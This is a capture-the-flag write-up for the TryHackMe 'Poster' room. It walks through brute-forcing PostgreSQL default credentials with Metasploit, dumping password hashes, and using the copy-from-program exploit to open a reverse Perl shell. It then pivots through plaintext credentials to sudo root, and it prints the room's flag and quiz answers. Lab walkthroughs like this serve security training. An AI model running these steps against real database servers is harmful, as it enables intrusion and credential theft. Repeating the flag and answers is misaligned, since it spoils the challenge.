The sys admin set up a rdbms in a safe way.
| Title | Poster |
|---|
| Description | The sys admin set up a rdbms in a safe way. |
| Points | 360 |
| Difficulty | Easy |
| Maker | stuxnet |
Summary
Poster: in this machine we use different metasploit modules that tagret a misconfigured rdbms postgresql, we get credentials, and exploit further to get a shell, once in, we pivote horizantly to get the user flag, and vertically to get the root flag.
Description
What is rdbms?
Depending on the EF Codd relational model, an RDBMS allows users to build, update, manage, and interact with a relational database, which stores data as a table.
Today, several companies use relational databases instead of flat files or hierarchical databases to store business data. This is because a relational database can handle a wide range of data formats and process queries efficiently. In addition, it organizes data into tables that can be linked internally based on common data. This allows the user to easily retrieve one or more tables with a single query. On the other hand, a flat file stores data in a single table structure, making it less efficient and consuming more space and memory.
Most commercially available RDBMSs currently use Structured Query Language (SQL) to access the database. RDBMS structures are most commonly used to perform CRUD operations (create, read, update, and delete), which are critical to support consistent data management.
Enumeration
after checking port 80, It lead me to nothing, so we’ll focus on postgresql for now.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| ┌──(azadin㉿kali)-[~/tryhackme]
└─$ nmap -p$ports -sC -sV -Pn -n 10.10.89.171
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 08:09 UTC
Nmap scan report for 10.10.89.171
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ 256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Poster CMS
5432/tcp open postgresql PostgreSQL DB 9.5.8 - 9.5.10 or 9.5.17 - 9.5.23
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after: 2030-07-27T00:54:25
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
To get good credentials let’s use metasploit and search for auxiliary modules that will help with enemurating the rdbms in hands:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| ┌──(azadin㉿kali)-[~/tryhackme]
└─$ msfconsole -q
msf6 > search type:auxiliary postgres
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/capture/postgresql . normal No Authentication Capture: PostgreSQL
1 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
2 auxiliary/analyze/crack_databases . normal No Password Cracker: Databases
3 \_ action: hashcat . . . Use Hashcat
4 \_ action: john . . . Use John the Ripper
5 auxiliary/scanner/postgres/postgres_dbname_flag_injection . normal No PostgreSQL Database Name Command Line Flag Injection
6 auxiliary/scanner/postgres/postgres_login . normal No PostgreSQL Login Utility
7 auxiliary/admin/postgres/postgres_readfile . normal No PostgreSQL Server Generic Query
8 auxiliary/admin/postgres/postgres_sql . normal No PostgreSQL Server Generic Query
9 auxiliary/scanner/postgres/postgres_version . normal No PostgreSQL Version Probe
10 auxiliary/scanner/postgres/postgres_hashdump . normal No Postgres Password Hashdump
11 auxiliary/scanner/postgres/postgres_schemadump . normal No Postgres Schema Dump
12 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
Interact with a module by name or index. For example info 12, use 12 or use auxiliary/admin/http/rails_devise_pass_reset
msf6 > use 6
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > options
|
we found the one, now using options will let us know what we need to configure exactly, just the rhosts in this case, and we run it !
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
| Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession false no Create a new session for every successful login
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current databas
e
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (A
ccepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/d no File containing passwords, one per line
ata/wordlists/postgres_default_pa
ss.txt
Proxies no A proxy chain of format type:host:port[,type:host:port][...
]. Supported proxies: socks5, socks5h, sapni, http, socks4
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/us
ing-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/d no File containing (space-separated) users and passwords, one
ata/wordlists/postgres_default_us pair per line
erpass.txt
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/d no File containing users, one per line
ata/wordlists/postgres_default_us
er.txt
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 10.10.89.171
RHOSTS => 10.10.89.171
msf6 auxiliary(scanner/postgres/postgres_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 10.10.89.171:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: Invalid username or password)
[+] 10.10.89.171:5432 - Login Successful: postgres:password@template1
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.89.171:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] You can open a Postgres session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/postgres/postgres_login) > use 8
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > options
Module options (auxiliary/admin/postgres/postgres_sql):
|
and we got correct credentials : postgres:password, now there is an rce with default creds, we use the 6 from the previous list of modules, we set the correct options again ( password -> password and rhosts )
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| msf6 auxiliary(admin/postgres/postgres_sql) > options
Module options (auxiliary/admin/postgres/postgres_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
RETURN_ROWSET true no Set to true to see query result sets
SQL select version() no The SQL query to execute
VERBOSE false no Enable verbose output
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres no The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
g-metasploit.html
RPORT 5432 no The target port
USERNAME postgres no The username to authenticate as
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/postgres/postgres_sql) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/postgres/postgres_sql) > set RHOSTS 10.10.89.171
RHOSTS => 10.10.89.171
msf6 auxiliary(admin/postgres/postgres_sql) > run
[*] Running module against 10.10.89.171
Query Text: 'select version()'
==============================
version
-------
PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] Auxiliary module execution completed
|
and this worked and also exposed the exact version nmap was guessing before : 9.5.21
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
| 10 auxiliary/scanner/postgres/postgres_hashdump . normal No Postgres Password Hashdump
11 auxiliary/scanner/postgres/postgres_schemadump . normal No Postgres Schema Dump
12 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
Interact with a module by name or index. For example info 12, use 12 or use auxiliary/admin/http/rails_devise_pass_reset
msf6 auxiliary(admin/postgres/postgres_sql) > use 10
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_hashdump) > options
Module options (auxiliary/scanner/postgres/postgres_hashdump):
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres no The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
g-metasploit.html
RPORT 5432 no The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME postgres no The username to authenticate as
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/postgres/postgres_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/postgres/postgres_hashdump) > set RHOSTS 10.10.89.171
RHOSTS => 10.10.89.171
msf6 auxiliary(scanner/postgres/postgres_hashdump) > run
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================
Username Hash
-------- ----
darkstart md58842b99375db43e9fdf238753623a27d
poster md578fb805c7412ae597b399844a54cce0a
postgres md532e12f215ba27cb750c9e093ce4b5127
sistemas md5f7dbc0d5a06653e74da6b1af9290ee2b
ti md57af9ac4c593e9e4f275576e13f935579
tryhackme md503aab1165001c8f8ccae31a8824efddc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
|
we use the module postgres_hashdump above and we indeed do get them.
for the next question : What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
the above list of auxiliary modules already has the answer: auxiliary/admin/postgres/postgres_readfile
and for the other one : What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?
we’ll be using : exploit/multi/postgres/postgres_copy_from_program_cmd_exec ( a simple search for exploit instead of auxiliary should get you this result )
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
| msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set password password
password => password
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_TABLE_OUTPUT false no select payload command output from table (For Debugging)
TABLENAME kUCyqgY8 yes A table name that does not exist (To avoid deletion)
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres no The database to authenticate against
PASSWORD password no The password for the specified username. Leave blank for a random password.
RHOSTS no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
g-metasploit.html
RPORT 5432 no The target port (TCP)
USERNAME postgres no The username to authenticate as
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set rhosts 10.10.89.171
rhosts => 10.10.89.171
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set lhost tun0
lhost => 10.9.2.77
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 10.9.2.77:4444
[*] 10.10.89.171:5432 - 10.10.89.171:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.89.171:5432 - Exploiting...
[+] 10.10.89.171:5432 - 10.10.89.171:5432 - kUCyqgY8 dropped successfully
[+] 10.10.89.171:5432 - 10.10.89.171:5432 - kUCyqgY8 created successfully
[+] 10.10.89.171:5432 - 10.10.89.171:5432 - kUCyqgY8 copied successfully(valid syntax/command)
[+] 10.10.89.171:5432 - 10.10.89.171:5432 - kUCyqgY8 dropped successfully(Cleaned)
[*] 10.10.89.171:5432 - Exploit Succeeded
[*] Command shell session 1 opened (10.9.2.77:4444 -> 10.10.89.171:34616) at 2025-07-04 08:35:24 +0000
getuid
id
uid=109(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)
ls /home
alison
dark
|
by setting the correct configuration again, we get a shell as postgres, and looking at the home directory we get two users. now we need to pivote as another user :
1
2
3
4
| ls /home/dark
credentials.txt
cat /home/dark/credentials.txt
dark:qwerty1234#!hackme
|
and looks like we found our way in! we just need to ssh from here as dark and get in.
User flag
here we see that the user.txt is in alison home directory, so we need to pivote once more, let’s see if there is a way we can do this, classical tricks didn’t work and before things the hard way, I remembered there was a web server running on port 80, so that directory may be worth checking.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| $ cd var
$ ls
backups cache lib local lock log mail opt run spool tmp www
$ cd www
$ ls -als
total 12
4 drwxr-xr-x 3 root root 4096 Jul 28 2020 .
4 drwxr-xr-x 12 root root 4096 Jul 28 2020 ..
4 drwxr-xr-x 3 root root 4096 Jul 28 2020 html
$ cd html
$ ls -als
total 16
4 drwxr-xr-x 3 root root 4096 Jul 28 2020 .
4 drwxr-xr-x 3 root root 4096 Jul 28 2020 ..
4 -rwxrwxrwx 1 alison alison 123 Jul 28 2020 config.php
4 drwxr-xr-x 4 alison alison 4096 Jul 28 2020 poster
$ cat config.php
<?php
$dbhost = "127.0.0.1";
$dbuname = "alison";
$dbpass = "p4ssw0rdS3cur3!#";
$dbname = "mysudopassword";
?>$
$ su alison
Password:
su: Authentication failure
$ su alison
Password:
alison@ubuntu:/var/www/html$ ls /home/alison
user.txt
|
and I was right, we find the db creds, trying to use them against the database didn’t work, so I tried to use them to loggin as alison, and that’s how we got our user flag.
Root Flag
this one lame, nothing necessary, as we already can use sudo for all commands, so just :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| alison@ubuntu:~$ sudo -l
[sudo] password for alison:
Matching Defaults entries for alison on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alison may run the following commands on ubuntu:
(ALL : ALL) ALL
alison@ubuntu:~$ sudo su
root@ubuntu:/home/alison# cd /root
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
THM{c0ngrats_for_read_the_f1le_w1th_credent1als}
root@ubuntu:~#
|
